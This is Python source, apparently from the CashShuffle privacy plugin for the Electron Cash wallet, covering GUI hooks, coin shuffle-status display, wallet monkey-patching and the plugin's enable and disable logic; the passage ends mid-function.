def network_callback(window, event, *args):
''' This gets called in the network thread. It should just emit signals to GUI
if it is to do any GUI work. '''
if event == 'new_transaction':
if len(args) == 2 and hasattr(window, 'wallet') and args[1] is window.wallet and args[0]:
window._shuffle_sigs.tx.emit(window, args[0])
def my_custom_item_setup(utxo_list, item, utxo, name):
if not hasattr(utxo_list.wallet, 'is_coin_shuffled'):
return
prog = utxo_list.in_progress.get(name, "")
frozenstring = item.data(0, utxo_list.DataRoles.frozen_flags) or ""
is_reshuffle = name in utxo_list.wallet._reshuffles
u_value = utxo['value']
if not is_reshuffle and utxo_list.wallet.is_coin_shuffled(utxo): # already shuffled
item.setText(5, _("Shuffled"))
elif not is_reshuffle and utxo['address'] in utxo_list.wallet._shuffled_address_cache: # we hit the cache directly as a performance hack. we don't really need a super-accurate reply as this is for UI and the cache will eventually be accurate
item.setText(5, _("Shuffled Addr"))
elif not prog and ("a" in frozenstring or "c" in frozenstring):
item.setText(5, _("Frozen"))
elif u_value >= BackgroundShufflingThread.UPPER_BOUND: # too big
item.setText(5, _("Too big"))
elif u_value < BackgroundShufflingThread.LOWER_BOUND: # too small
item.setText(5, _("Too small"))
elif utxo['height'] <= 0: # not_confirmed
if is_reshuffle:
item.setText(5, _("Unconfirmed (reshuf)"))
else:
item.setText(5, _("Unconfirmed"))
# for now we unconditionally disallow coinbase coins. See CashShuffle issue #64
# elif utxo['coinbase'] and (utxo['height'] + COINBASE_MATURITY > utxo_list.wallet.get_local_height()): # maturity check
# item.setText(5, _("Not mature"))
elif utxo['coinbase']: # we disallow coinbase coins
item.setText(5, _("Coinbase"))
elif (u_value >= BackgroundShufflingThread.LOWER_BOUND
and u_value < BackgroundShufflingThread.UPPER_BOUND): # queued_labels
window = utxo_list.parent
if (window and window.background_process and utxo_list.wallet.network
and utxo_list.wallet.network.is_connected()):
if window.background_process.get_paused():
item.setText(5, _("Paused"))
else:
if is_reshuffle:
item.setText(5, _("In queue (reshuf)"))
else:
item.setText(5, _("In queue"))
else:
item.setText(5, _("Offline"))
if prog == 'in progress': # in progress
item.setText(5, _("In progress"))
elif prog.startswith('phase '):
item.setText(5, _("Phase {}").format(prog.split()[-1]))
elif prog == 'wait for others': # wait for others
item.setText(5, _("Wait for others"))
elif prog.startswith("got players"): # got players > 1
num, tot = (int(x) for x in prog.rsplit(' ', 2)[-2:])
txt = "{} ({}/{})".format(_("Players"), num, tot)
item.setText(5, txt)
elif prog == "completed":
item.setText(5, _("Done"))
def my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected):
''' Adds CashShuffle related actions to the utxo_list context (right-click)
menu '''
wallet = window.wallet
shuffled_selected = [name for name,flags in selected.items()
if (not flags
and wallet.is_coin_shuffled(CoinUtils.coin_name_to_dict(name))
and name not in wallet._reshuffles)]
reshuffles_selected = [name for name in selected if name in wallet._reshuffles]
menu.addSection(_('CashShuffle'))
def on_reshuffle():
wallet._reshuffles.update(set(shuffled_selected))
utxo_list.update()
def on_cancel_reshuffles():
wallet._reshuffles.difference_update(set(reshuffles_selected))
utxo_list.update()
len_shufs, len_reshufs = len(shuffled_selected), len(reshuffles_selected)
if len_shufs:
if len_shufs == 1:
action = menu.addAction(_('Reshuffle Coin'), on_reshuffle)
else:
action = menu.addAction(_('Reshuffle {} Shuffled').format(len_shufs), on_reshuffle)
if len_reshufs:
if len_reshufs == 1:
action = menu.addAction(_('Cancel Reshuffle'), on_cancel_reshuffles)
else:
action = menu.addAction(_('Cancel {} Reshuffles').format(len_reshufs), on_cancel_reshuffles)
def _make_label(window, tot, shufamt, chg, fee, scale):
is_dusty_fee = not chg and fee - BackgroundShufflingThread.FEE > 0
# satoshis -> display format
tot, shufamt, chg = window.format_amount(tot), window.format_amount(shufamt), window.format_amount(chg) if chg else ''
chgtxt = " + {} ".format(chg) if chg else " "
# Note it's important that the "Shuffle" prefix not be translated because we use it elsewhere
# in the filter shuffle history callback... and it's also a "proper name" :)
return ( "Shuffle" + (" {} {} {} {}{}(-{} sats {})"
.format(tot, window.base_unit(),
BackgroundShufflingThread.SCALE_ARROW_DICT.get(scale, BackgroundShufflingThread.SCALE_ARROW_UNKNOWN),
shufamt, chgtxt, fee, _("fee") if not is_dusty_fee else _("dusty fee")
)
)
)
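# _make_label() produces history labels of the form
# "Shuffle <total> <unit> <scale arrow> <shuffled amount> + <change> (-<fee> sats fee)";
# history_list_filter() below relies on the untranslated "Shuffle " prefix and the arrow.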
def update_coin_status(window, coin_name, msg):
if getattr(window.utxo_list, "in_progress", None) is None:
return
#print_error("[shuffle] wallet={}; Coin {} Message '{}'".format(window.wallet.basename(), coin_name, msg.strip()))
prev_in_progress = window.utxo_list.in_progress.get(coin_name)
new_in_progress = prev_in_progress
msg = msg or '' # force str
coin_name = coin_name or '' # force str
if coin_name not in ("MAINLOG", "PROTOCOL"):
if msg.startswith("Player"):
if "get session number" in msg:
new_in_progress = 'wait for others'
elif 'joined the pool' in msg:
try:
num = int(msg.split(' ', 2)[1])
if num > 1:
# got more players than just self
new_in_progress = 'got players {} {}'.format(num, window.background_process.poolSize)
except (ValueError, IndexError):
pass
elif "begins CoinShuffle protocol" in msg:
new_in_progress = 'in progress'
elif "reaches phase" in msg:
pos = msg.find("reaches phase")
parts = msg[pos:].split(' ', 2)
try:
phase = int(parts[2])
new_in_progress = 'phase {}'.format(phase)
except (IndexError, ValueError):
pass
elif msg.endswith("complete protocol"):
new_in_progress = "completed" # NB: these don't leak. they eventually get cleaned up by the 'forget ' command from the background thread after some time
elif msg.startswith("Error"):
new_in_progress = None # flag to remove from progress list
if ERR_SERVER_CONNECT in msg or ERR_BAD_SERVER_PREFIX in msg:
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif msg.startswith("Blame") and "insufficient" not in msg and "wrong hash" not in msg:
new_in_progress = None
elif msg.startswith("shuffle_txid:"): # TXID message -- call "set_label"
words = msg.split()
label = _("CashShuffle") # fallback on parse error
if len(words) >= 2:
txid = words[1]
try:
tot, shufamt, chg, fee, scale = [int(w) for w in words[2:7]] # parse satoshis
label = _make_label(window, tot, shufamt, chg, fee, scale)
except (IndexError, ValueError, TypeError) as e:
# Hmm. Some sort of parse error. We'll label it 'CashShuffle'
window.print_error("*** WARNING: Could not parse shuffle_txid message:", str(e), msg)
window.wallet.set_label(txid, label)
Plugin._increment_shuffle_counter(window)
window.update_wallet()
elif msg.startswith("add_tentative_shuffle:"):
# add_tentative_shuffle: utxo outaddr tot scale chg fee
# This is a mechanism as a workaround for issue #70 -- it's possible for last player to delay and cause other players to miss the txid.
try:
words = msg.split()
utxo, addr = words[1:3]
tot, shufamt, chg, fee, scale = [int(x) for x in words[3:8]] # parse satoshis
window._shuffle_tentative[utxo] = (addr, tot, shufamt, chg, fee, scale) # remember this tentative shuffle so we can generate a label for it if we see a matching tx come in later
except (IndexError, ValueError, TypeError) as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse add_tentative_shuffle message:", str(e), msg)
elif msg.startswith("del_tentative_shuffle:"):
try:
utxo = msg.split()[1]
window._shuffle_tentative.pop(utxo, None) # tolerate del commands for missing values from dict
except IndexError as e:
# Some sort of parse error...
window.print_error("*** WARNING: Could not parse del_tentative_shuffle message:", str(e), msg)
if not msg.startswith("Error") and not msg.startswith("Exit"):
window.cashshuffle_set_flag(0) # 0 means ok
elif new_in_progress != 'completed' and prev_in_progress == new_in_progress: # "Exit" or "Error"
# thread exit or error without completing protocol, set status back to 'in queue'
# -- fixes wrong status of 'in progress' and 'waiting for others' being shown in UI for dead threads
new_in_progress = None
else:
if msg == "stopped":
window.utxo_list.in_progress.clear(); new_in_progress = prev_in_progress = None
elif msg.startswith("forget "):
words = msg.strip().split()
prev_in_progress = 1; new_in_progress = None; coin_name = words[-1] # force the code below to pop the coin that we were asked to forget from the status dict
elif ERR_SERVER_CONNECT in msg:
new_in_progress = None # flag to remove from progress list
window.cashshuffle_set_flag(1) # 1 means server connection issue
elif MSG_SERVER_OK in msg:
new_in_progress = None
window.cashshuffle_set_flag(0) # server is ok now.
if prev_in_progress != new_in_progress:
if new_in_progress is None:
window.utxo_list.in_progress.pop(coin_name, None)
else:
window.utxo_list.in_progress[coin_name] = new_in_progress
window.utxo_list.update()
def _got_tx_check_tentative_shuffles(window, tx):
''' GUI thread: Got a new transaction for a window, so see if we should
apply the shuffle_tentative label to it. The below mechanism is a
workaround for bug #70. '''
t = getattr(window, '_shuffle_tentative', None)
if not t:
# Most of the time this code path is taken as the dict is usually empty.
# It only ever has entries when a shuffle failed at phase 4.
return
inputs, outputs = tx.inputs(), tx.outputs()
for utxo, info in t.copy().items():
# loop through all of the "tentative tx's" we have. this dict should be very small,
# it only contains entries for shuffles that timed out in phase 4 where last player took too long (bug #70)
addr, tot, amt, chg, fee, scale = info
for txin in inputs:
if CoinUtils.get_name(txin) == utxo:
# found the coin in the incoming tx. Now make sure it's our anticipated shuffle tx that failed and not some other tx, so we apply the correct label only when it's the phase-4-failed shuffle tx.
for n, txout in enumerate(outputs):
# Search the outputs of this tx to make sure they match what we expected for scale, out_addr...
typ, _addr, amount = txout
# the below checks make sure it matches what we expected from the failed shuffle, and also that the coin is shuffled (paranoia check).
if isinstance(_addr, Address) and amount == amt and _addr.to_storage_string() == addr:
txid = tx.txid()
if CoinUtils.is_coin_shuffled(window.wallet, {'prevout_hash':txid, 'prevout_n':n, 'address':_addr, 'value':amount}, {txid: tx}):
# all checks pass -- we successfully recovered from bug #70! Hurray!
window.wallet.set_label(txid, _make_label(window, tot, amt, chg, fee, scale))
Plugin._increment_shuffle_counter(window)
window.print_error("CashShuffle: found coin {} in tentative shuffle cache, applied label".format(utxo))
window.update_wallet()
else:
# hmm. this branch is very very unlikely.
window.print_error("CashShuffle: found coin {} in shuffle cache, but its tx is not a shuffle tx; label not applied".format(utxo))
break
else:
# This coin was spent in this tx, but it appears to not be the tx we anticipated.. Last player didn't broadcast and we spent it later (perhaps as a re-shuffle or other).
window.print_error("CashShuffle: removing spent coin {} from tentative shuffle cache, label not applied".format(utxo))
t.pop(utxo) # unconditionally remove this tentative coin from the dict since either way it's spent
return
def _got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx):
''' Freeze address after spending from a shuffled coin address for privacy (issue #100).
Also remove any shuffled coin spends from the _is_shuffled_cache. '''
inputs = tx.inputs()
addrs_to_freeze = set()
coins_to_purge_from_shuffle_cache = list()
coins_to_purge_from_reshuffles = set()
wallet = window.wallet
all_addresses = None
def is_mine(a):
''' This is faster than calling wallet.is_mine on *each* input
as that involves a lot of rebuilding of the addresses list for each call.
Also we use a set here which is faster than O(n) list lookup.
This matters on huge tx's with many inputs as a speedup.'''
nonlocal all_addresses
if all_addresses is None:
all_addresses = set(wallet.get_addresses())
return a in all_addresses
for inp in inputs:
addr = inp['address']
if isinstance(addr, Address) and is_mine(addr):
# This coin was ours, purge True/False results from the
# _is_shuffled_cache for this coin.
name = CoinUtils.get_name(inp)
coins_to_purge_from_shuffle_cache.append(name)
coins_to_purge_from_reshuffles.add(name)
if addr not in addrs_to_freeze and wallet.is_coin_shuffled(inp):
# We spent a shuffled coin belonging to us.
# Freeze that address to protect privacy.
addrs_to_freeze.add(addr)
if addrs_to_freeze:
change_addr_set = set(wallet.get_change_addresses())
addrs_to_freeze2 = addrs_to_freeze & change_addr_set # we *ONLY* freeze if change address. see #1291
if addrs_to_freeze2:
wallet.set_frozen_state(addrs_to_freeze2, True)
for addr in addrs_to_freeze2:
name = addr.to_storage_string()
if not wallet.labels.get(name): # only put a label in there if no label there already
wallet.set_label(name, _("Shuffled coin spent (frozen for privacy)"))
# the below is to prevent the "is_shuffled_cache" from growing forever which
# impacts performance and wastes memory. Since we were checking a seen TX
# anyway, might as well expire coins from the cache that were spent.
# remove_from_shufflecache acquires locks as it operates on the cache.
CoinUtils.remove_from_shufflecache(wallet, coins_to_purge_from_shuffle_cache)
# "forget" that these addresses were designated as shuffled addresses.
CoinUtils.remove_from_shuffled_address_cache(wallet, addrs_to_freeze)
wallet._reshuffles.difference_update(coins_to_purge_from_reshuffles)
def _got_tx(window, tx):
''' Generic callback to monitor tx's received for a wallet. Note that
if this is called the tx definitely is for this window/wallet. '''
if not hasattr(window, '_shuffle_patched_'):
        # defensive programming in case this signal arrives late
# just as the user was disabling cash shuffle
# (signal arrives via QueuedConnection which is why this check is necessary)
return
_got_tx_check_tentative_shuffles(window, tx) # check for workaround to bug#70
_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc(window, tx) # Feature #100
# Note at this point the is_shuffled cache has had entries for inputs in
# the tx above removed. If you want to add checks to this function that
# involve the _is_shuffled_cache, do it above before the
# '_got_tx_check_if_spent_shuffled_coin_and_freeze_used_address_etc' call.
class MsgForwarder(QObject):
''' Forwards messages from BackgroundShufflingThread to the GUI thread using
Qt signal magic. See function update_coin_status above. '''
gotMessage = pyqtSignal(str, str)
def __init__(self, window):
super().__init__(None)
self.window = window
self.gotMessage.connect(self.gotMsgSlot)
def send(self, msg, sender):
self.gotMessage.emit(msg, sender)
def gotMsgSlot(self, msg, sender):
update_coin_status(self.window, sender, msg)
def disconnectAll(self):
try:
self.gotMessage.disconnect()
except:
pass
def start_background_shuffling(window, network_settings, period = 10.0, password = None, timeout = 60.0):
logger = MsgForwarder(window)
window.background_process = BackgroundShufflingThread(window,
window.wallet,
network_settings,
logger = logger,
period = period,
password = password,
timeout = timeout)
window.background_process.start()
def monkey_patches_apply(window):
def patch_window(window):
if getattr(window, '_shuffle_patched_', None):
return
window.background_process = None
window.send_tab_shuffle_extra = SendTabExtra(window)
window._shuffle_tentative = dict()
class Sigs(QObject):
tx = pyqtSignal(QObject, object)
window._shuffle_sigs = sigs = Sigs(window)
sigs.tx.connect(_got_tx)
window._shuffle_network_callback = lambda event, *args: network_callback(window, event, *args)
if window.network:
window.network.register_callback(window._shuffle_network_callback, ['new_transaction'])
window._shuffle_patched_ = True
window.force_use_single_change_addr = _("CashShuffle is enabled: change address logic will be handled by CashShuffle (to preserve privacy).")
print_error("[shuffle] Patched window")
def patch_utxo_list(utxo_list):
if getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
header_labels.append(_("Shuffle status"))
utxo_list.update_headers(header_labels)
utxo_list.in_progress = dict()
utxo_list._shuffle_patched_ = True
print_error("[shuffle] Patched utxo_list")
def patch_wallet(wallet):
if getattr(wallet, '_shuffle_patched_', None):
return
wallet.is_coin_shuffled = lambda coin, txs=None: CoinUtils.is_coin_shuffled(wallet, coin, txs)
wallet.get_shuffled_and_unshuffled_coins = lambda *args, **kwargs: CoinUtils.get_shuffled_and_unshuffled_coins(wallet, *args, **kwargs)
wallet.cashshuffle_get_new_change_address = lambda for_shufflethread=False: CoinUtils.get_new_change_address_safe(wallet, for_shufflethread=for_shufflethread)
wallet._is_shuffled_cache = dict()
wallet._shuffled_address_cache = set()
wallet._addresses_cashshuffle_reserved = set()
wallet._reshuffles = set()
wallet._last_change = None
CoinUtils.load_shuffle_change_shared_with_others(wallet) # sets wallet._shuffle_change_shared_with_others
# Paranoia -- force wallet into this single change address mode in case
# other code (plugins, etc) generate tx's. We don't want tx generation
# code to clobber our shuffle tx output addresses.
change_addr_policy_1 = (bool(wallet.storage.get('use_change')), bool(wallet.storage.get('multiple_change')))
change_addr_policy_2 = (bool(wallet.use_change), bool(wallet.multiple_change))
desired_policy = (True, False)
if any(policy != desired_policy for policy in (change_addr_policy_1, change_addr_policy_2)):
wallet.use_change, wallet.multiple_change = desired_policy
wallet.storage.put('use_change', desired_policy[0])
wallet.storage.put('multiple_change', desired_policy[1])
wallet.print_error("CashShuffle forced change address policy to: use_change={}, multiple_change={}"
.format(desired_policy[0], desired_policy[1]))
# More paranoia -- in case app crashed, unfreeze coins frozen by last
# app run.
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
wallet._shuffle_patched_ = True
print_error("[shuffle] Patched wallet")
patch_wallet(window.wallet)
patch_utxo_list(window.utxo_list)
patch_window(window)
def monkey_patches_remove(window):
def restore_window(window):
if not getattr(window, '_shuffle_patched_', None):
return
if window.network:
window.network.unregister_callback(window._shuffle_network_callback)
delattr(window, '_shuffle_network_callback')
try: window._shuffle_sigs.tx.disconnect()
except TypeError: pass
window._shuffle_sigs.deleteLater()
delattr(window, "_shuffle_sigs")
delattr(window, '_shuffle_tentative')
window.send_tab_shuffle_extra.setParent(None); window.send_tab_shuffle_extra.deleteLater();
delattr(window, 'send_tab_shuffle_extra')
delattr(window, 'background_process')
delattr(window, '_shuffle_patched_')
window.force_use_single_change_addr = None
print_error("[shuffle] Unpatched window")
# Note that at this point an additional monkey patch: 'window.__disabled_sendtab_extra__' may stick around until the plugin is unloaded altogether
def restore_utxo_list(utxo_list):
if not getattr(utxo_list, '_shuffle_patched_', None):
return
header = utxo_list.headerItem()
header_labels = [header.text(i) for i in range(header.columnCount())]
del header_labels[-1]
utxo_list.update_headers(header_labels)
        utxo_list.in_progress = None
        delattr(utxo_list, "in_progress")
        delattr(utxo_list, '_shuffle_patched_')
print_error("[shuffle] Unpatched utxo_list")
def restore_wallet(wallet):
if not getattr(wallet, '_shuffle_patched_', None):
return
delattr(wallet, '_addresses_cashshuffle_reserved')
delattr(wallet, 'cashshuffle_get_new_change_address')
delattr(wallet, "is_coin_shuffled")
delattr(wallet, "get_shuffled_and_unshuffled_coins")
delattr(wallet, "_is_shuffled_cache")
delattr(wallet, "_shuffled_address_cache")
delattr(wallet, '_shuffle_patched_')
delattr(wallet, "_last_change")
delattr(wallet, "_reshuffles")
CoinUtils.store_shuffle_change_shared_with_others(wallet) # save _shuffle_change_shared_with_others to storage -- note this doesn't call storage.write() for performance reasons.
delattr(wallet, '_shuffle_change_shared_with_others')
CoinUtils.unfreeze_frozen_by_shuffling(wallet)
print_error("[shuffle] Unpatched wallet")
restore_window(window)
restore_utxo_list(window.utxo_list)
restore_wallet(window.wallet)
def _elide(x, maxlen=30, startlen=8):
''' Useful for eliding GUI text with an ellipsis ... in the middle '''
if len(x) > maxlen and startlen + 3 < maxlen:
return x[:startlen] + "..." + x[-(maxlen-startlen-3):]
return x
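# e.g. _elide("abcdefghijklmnopqrstuvwxyz0123456789", maxlen=20) == "abcdefgh...123456789"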
class Plugin(BasePlugin):
instance = None # The extant instance singleton, if any. Variable is cleared on plugin stop.
    gui = None # The "gui object" singleton (ElectrumGui) -- a useful reference to keep around.
network_dialog = None # The NetworkDialog window singleton (managed by the ElectrumGui singleton).
def fullname(self):
return 'CashShuffle'
def description(self):
return _("CashShuffle Protocol")
def is_available(self):
return True
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.windows = []
        self.disabled_windows = [] # this is to manage the "cashshuffle disabled" extra GUI element in the send tab
self._hide_history_txs = False
self.initted = False
def is_defunct(self):
return Plugin.instance is not self
@hook
def init_qt(self, gui):
if self.initted:
return
self.print_error("Initializing...")
Plugin.instance = self
Plugin.gui = gui
self._delete_old_keys(gui.config)
if Plugin.network_dialog != gui.nd:
Plugin.network_dialog = gui.nd # each time we are stopped, our module gets re-imported and we lose globals... so try and recapture this singleton
ct = 0
for window in gui.windows:
self.on_new_window(window)
ct += 1
        self.on_network_dialog(Plugin.network_dialog) # If we have a network dialog, add self to it
self.initted = True
self._hide_history_txs = bool(gui.config.get(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, False))
self.print_error("Initialized (had {} extant windows).".format(ct))
self._hide_history_txs_check()
@hook
def on_network_dialog(self, nd):
Plugin.network_dialog = nd
if not nd: return
self.print_error("OnNetworkDialog", str(nd))
if not hasattr(nd, "__shuffle_settings__") or not nd.__shuffle_settings__:
nd.__shuffle_settings__ = st = SettingsTab(parent=nd.nlayout.tabs, config=nd.nlayout.config)
nd.nlayout.tabs.addTab(st, _("CashShuffle"))
st.applyChanges.connect(Plugin.try_to_apply_network_dialog_settings)
elif nd.__shuffle_settings__:
# they may have a fake view if they didn't apply the last settings, refresh the view
st = nd.__shuffle_settings__
st.refreshFromSettings()
def show_cashshuffle_tab_in_network_dialog(self, window):
window.gui_object.show_network_dialog(window)
nd = Plugin.network_dialog
if nd and getattr(nd, '__shuffle_settings__', None):
st = nd.__shuffle_settings__
nd.nlayout.tabs.setCurrentWidget(st)
nd.activateWindow()
return True
return False
def del_network_dialog_tab(self):
# delete the shuffle settings widget
if Plugin.network_dialog and hasattr(Plugin.network_dialog, '__shuffle_settings__'):
nd = Plugin.network_dialog
st = Plugin.network_dialog.__shuffle_settings__
if st:
idx = nd.nlayout.tabs.indexOf(st)
if idx > -1:
if nd.nlayout.tabs.currentIndex() == idx:
nd.nlayout.tabs.setCurrentIndex(0)
nd.nlayout.tabs.removeTab(idx)
st.kill()
st.setParent(None)
st.deleteLater() # need to call this otherwise it sticks around :/
st = None
Plugin.network_dialog.__shuffle_settings__ = None
self.print_error("Removed CashShuffle network settings tab")
def window_has_cashshuffle(self, window):
return window in self.windows
def window_wants_cashshuffle(self, window):
return window.wallet.storage.get(ConfKeys.PerWallet.ENABLED, False)
def window_set_wants_cashshuffle(self, window, b):
window.wallet.storage.put(ConfKeys.PerWallet.ENABLED, bool(b))
def window_set_cashshuffle(self, window, b):
if not b and self.window_has_cashshuffle(window):
self._disable_for_window(window)
elif b and not self.window_has_cashshuffle(window):
self._enable_for_window(window)
self.window_set_wants_cashshuffle(window, b)
def _window_set_disabled_extra(self, window):
self._window_clear_disabled_extra(window)
window.__disabled_sendtab_extra__ = SendTabExtraDisabled(window)
def _window_clear_disabled_extra(self, window):
extra = getattr(window, "__disabled_sendtab_extra__", None)
if extra:
extra.setParent(None) # python will gc this badboy
delattr(window, "__disabled_sendtab_extra__")
del extra # hopefully object refct goes immediately to 0 and this widget dies quickly.
return True
@hook
def on_new_window(self, window):
if not window.is_wallet_cashshuffle_compatible():
# wallet is watching-only, multisig, or hardware so.. mark it permanently for no cashshuffle
self.window_set_cashshuffle(window, False)
window.update_status() # this has the side-effect of refreshing the cash shuffle status bar button's context menu (which has actions even for disabled/incompatible windows)
return
if window.wallet and not self.window_has_cashshuffle(window):
if self.window_wants_cashshuffle(window):
self._enable_for_window(window) or self._window_add_to_disabled(window)
else:
self._window_add_to_disabled(window)
def _enable_for_window(self, window):
name = window.wallet.basename()
self.print_error("Window '{}' registered, performing window-specific startup code".format(name))
if window.gui_object.warn_if_no_secp(
parent=window,
message=_("CashShuffle requires libsecp; cannot enable shuffling for this wallet."),
icon=QMessageBox.Critical):
self.print_error("Refusing to enable CashShuffle for window '{}' because no libsecp :(".format(name))
return
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
cached_password = window.gui_object.get_cached_password(window.wallet)
password = None
while window.wallet.has_password():
msg = _("CashShuffle requires access to '{}'.").format(name) + "\n" + _('Please enter your password')
if cached_password:
password = cached_password
cached_password = None
else:
pwdlg = PasswordDialog(parent=window.top_level_window(), msg=msg)
password = pwdlg.run()
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if password is None:
# User cancelled password input
if not self.warn_if_shuffle_disable_not_ok(window, msg=_('CashShuffle will now be <i>disabled</i> for a wallet which has previously had it <b>enabled</b>. Are you sure?')):
# User was warned and opted to try again to enable
continue
self.window_set_cashshuffle(window, False)
window.show_error(_("CashShuffle password prompt canceled; disabling for this wallet."), parent=window)
return
try:
window.wallet.check_password(password)
break
except Exception as e:
window.show_error(str(e), parent=window)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
continue
network_settings = Plugin.get_network_settings(window.config)
if not network_settings:
network_settings = self.settings_dialog(window, msg=_("Please choose a CashShuffle server"), restart_ask = False)
if self.is_defunct(): return # we need to do this because presentation of above dialog box may mean user had the opportunity to close the plugin in another window
if not network_settings:
self.window_set_cashshuffle(window, False)
window.show_error(_("Can't get network, disabling CashShuffle."), parent=window)
return
self._delete_old_keys(window.wallet)
self._window_remove_from_disabled(window)
network_settings = copy.deepcopy(network_settings)
network_settings['host'] = network_settings.pop('server')
monkey_patches_apply(window)
self.windows.append(window)
self._increment_session_counter(window)
window.update_status()
window.utxo_list.update()
start_background_shuffling(window, network_settings, password=password)
return True
@hook
def utxo_list_item_setup(self, utxo_list, item, x, name):
my_custom_item_setup(utxo_list, item, x, name)
@hook
def utxo_list_context_menu_setup(self, utxo_list, menu, selected):
window = utxo_list.parent
if window in self.windows:
my_custom_utxo_context_menu_setup(window, utxo_list, menu, selected)
@hook
def history_list_filter(self, history_list, h_item, label):
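        # Hook: return True to hide this history row, None to leave it visible.
        # When "hide shuffle txs" is on we hide rows whose label looks like an
        # auto-generated shuffle label (starts with "Shuffle " and contains one
        # of the scale-arrow markers).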
if self._hide_history_txs:
return bool(label.startswith("Shuffle ") # this string is not translated for performance reasons. _make_label also does not translate this string.
and ( any( x for x in BackgroundShufflingThread.SCALE_ARROWS
if x in label )
or BackgroundShufflingThread.SCALE_ARROW_UNKNOWN in label
)
)
return None
@hook
def history_list_context_menu_setup(self, history_list, menu, item, tx_hash):
# NB: We unconditionally create this menu if the plugin is loaded because
# it's possible for any wallet, even a watching-only wallet to have
# shuffle tx's with the correct labels (if the user uses labelsync or
# has imported labels).
menu.addSeparator()
def action_callback():
self._hide_history_txs = not self._hide_history_txs
Plugin.gui.config.set_key(ConfKeys.Global.HIDE_TXS_FROM_HISTORY, self._hide_history_txs, save=True)
action.setChecked(self._hide_history_txs)
if self._hide_history_txs:
tip = _("Shuffle transactions are now hidden")
else:
tip = _("Shuffle transactions are now shown")
QToolTip.showText(QCursor.pos(), tip, history_list)
history_list.update() # unconditionally update this history list as it may be embedded in the address_detail window and not a global history list..
for w in Plugin.gui.windows:
# Need to update all the other open windows.
# Note: We still miss any other open windows' address-detail
# history lists with this.. but that's ok as most of the
# time it won't be noticed by people and actually
# finding all those windows would just make this code
# less maintainable.
if history_list is not w.history_list: # check if not already updated above
w.history_list.update()
action = menu.addAction(_("Hide shuffle transactions"), action_callback)
action.setCheckable(True)
action.setChecked(self._hide_history_txs)
def on_close(self):
''' This is called on plugin unload/disable '''
self.del_network_dialog_tab()
PoolsWinMgr.killInstance()
for window in self.windows.copy():
self.on_close_window(window)
for window in self.disabled_windows.copy():
self.on_close_window(window)
for window in self.gui.windows:
# lastly, we do this for ALL the extant wallet windows because all
# of their CashShuffle context menus attached to the cashshuffle
# status button need updating when the plugin is exited. Note
# that there may be windows in this set (incompatible windows)
# that aren't in either of the above 2 sets of windows.
window.update_status()
self.initted = False
Plugin.instance = None
self.print_error("Plugin closed")
assert len(self.windows) == 0 and len(self.disabled_windows) == 0, (self.windows, self.disabled_windows)
self._hide_history_txs_check()
def _hide_history_txs_check(self):
        # Handle the possibility that, now that the plugin has been closed or opened, shuffle txs need to be hidden or shown again; refresh the history lists to apply the change.
if self._hide_history_txs and Plugin.gui:
def refresh_history_lists(gui):
for w in gui.windows:
w.history_list.update()
QTimer.singleShot(250, lambda: refresh_history_lists(Plugin.gui))
@hook
def on_close_window(self, window):
def didRemove(window):
self.print_error("Window '{}' removed".format(window.wallet.basename()))
if self._window_remove_from_disabled(window):
didRemove(window)
return
if self._disable_for_window(window, add_to_disabled = False):
didRemove(window)
return
def _disable_for_window(self, window, add_to_disabled = True):
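        # Tears down shuffling for a window that currently has it enabled:
        # joins the background thread, removes the monkey patches, refreshes the
        # UI, and (optionally) moves the window onto the disabled list.
        # Returns True if the window was one of ours, None otherwise.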
if window not in self.windows:
return
name = window.wallet.basename()
if window.background_process:
self.print_error("Joining background_process...")
window.background_process.join()
window.background_process.logger.disconnectAll(); window.background_process.logger.deleteLater()
window.background_process = None
self.print_error("Window '{}' closed, ended shuffling for its wallet".format(name))
self.windows.remove(window)
monkey_patches_remove(window)
window.utxo_list.update()
window.update_status()
self.print_error("Window '{}' disabled".format(name))
if add_to_disabled:
self._window_add_to_disabled(window)
else:
self._window_remove_from_disabled(window)
return True
def _window_add_to_disabled(self, window):
if window not in self.disabled_windows:
self._window_set_disabled_extra(window)
self.disabled_windows.append(window)
return True
def _window_remove_from_disabled(self, window):
self._window_clear_disabled_extra(window)
if window in self.disabled_windows:
self.disabled_windows.remove(window)
return True
@hook
def on_new_password(self, window, old, new):
if getattr(window, 'background_process', None):
self.print_error("Got new password for wallet {} informing background process...".format(window.wallet.basename() if window.wallet else 'UNKNOWN'))
window.background_process.set_password(new)
@hook
def on_spend_coins(self, window, coins):
if (not coins or window not in self.windows
# the coin may not be "mine" if doing private key -> sweep
# in that case, just abort this as it doesn't matter what
# mode the send tab is in
or (window.tx_external_keypairs
and not window.wallet.is_mine(coins[0]['address']))):
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
is_shuffled = CoinUtils.is_coin_shuffled(window.wallet, coins[0]) # check coins[0]
if spend_mode == extra.SpendingModeShuffled and not is_shuffled:
# Coin is not shuffled, spend mode is Shuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeUnshuffled)
elif spend_mode == extra.SpendingModeUnshuffled and is_shuffled:
# Coin is shuffled, spend mode is UnShuffled, force send tab to
# coin's mode
extra.setSpendingMode(extra.SpendingModeShuffled)
@hook
def spendable_coin_filter(self, window, coins):
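        # Hook called when the send tab gathers spendable coins. We mutate the
        # `coins` list in place so that only coins matching the currently
        # selected spending mode (Shuffled vs. Unshuffled) remain.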
if not coins or window not in self.windows:
return
extra = window.send_tab_shuffle_extra
spend_mode = extra.spendingMode()
        external_coin_addresses = set()  # only ever non-empty during a private-key sweep, in which case we always allow the coins involved in the sweep
for pubkey in window.tx_external_keypairs:
a = Address.from_pubkey(pubkey)
external_coin_addresses.add(a)
if spend_mode == extra.SpendingModeShuffled:
